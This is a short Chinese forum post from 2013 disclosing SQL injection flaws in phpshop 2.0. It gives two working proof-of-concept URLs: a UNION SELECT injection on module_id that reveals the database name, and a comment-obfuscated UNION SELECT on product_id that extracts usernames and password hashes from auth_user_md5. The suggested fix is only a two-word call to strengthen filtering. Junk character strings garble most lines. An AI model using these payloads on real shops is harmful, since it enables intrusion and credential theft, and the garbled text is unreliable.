标题 : phpshop 2.0 SQL Injection Vulnerability
- q. j y* z1 M+ y3 d' i# C2 P5 |5 r' n, l1 O( _ X
作者 : By onestree& T7 N" q5 s9 u: X) r, v
下载地址 : http://code.google.com/p/phpshop/downloads/list
% i+ z* p' z: @* ^测试地址: windows 7 / ubuntu2 ], ?, ?7 g# l9 m: Z4 G
7 c3 `6 ?& G5 H& T6 @1 F$ N , }% c/ b& r1 x7 g
SQLi p0c:
) [+ L5 k& G8 o, w I+ D6 g" @ 9 g r9 W4 g: F' K6 y7 T* u
==================+ ^. \1 R" m# q1 u) Q$ V0 A& g
- T+ c, k+ I! T/ Y2 o5 y; Fhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
- J$ ]! j0 f5 U# O: N9 _3 B$ v Aunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
! f$ Z1 }6 j5 z! s N+ v% P7 B 3 k" }) t+ k5 U7 s7 K! y
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
; f7 H3 U( d, N, Y U9 K# q
3 R5 z2 h' F: M修复:
; k2 i+ ~) n; t/ r加强过滤
( }1 ?2 m( w1 k0 X7 c9 I7 u, {5 G* T ~
- B+ J+ w# M1 z$ y2 ~$ l: ^ |
发表于 2013-1-18 18:24:10
收藏
支持
反对